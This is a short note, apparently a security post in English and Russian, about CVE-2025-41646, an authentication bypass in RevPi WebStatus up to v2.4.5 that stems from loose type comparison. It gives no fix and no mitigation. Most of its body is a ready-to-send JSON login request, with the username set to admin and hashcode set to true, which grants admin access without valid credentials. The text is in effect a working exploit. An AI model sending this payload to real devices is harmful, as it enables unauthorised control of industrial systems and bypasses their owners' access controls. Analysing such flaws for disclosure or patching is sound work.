
CVE-2025-41646 - Critical Authentication bypass
CVE-2025-41646 - Критический обход аутентификации
Критическая уязвимость обхода аутентификации (CVE-2025-41646) в RevPi WebStatus ≤ v2.4.5 позволяет злоумышленнику войти в систему как admin без действительных учетных данных из-за слабой логики сравнения типов (== vs ===).
Отправьте запрос на вход с:
{
"mode": "LOGIN",
"username": "admin",
"hashcode": true
}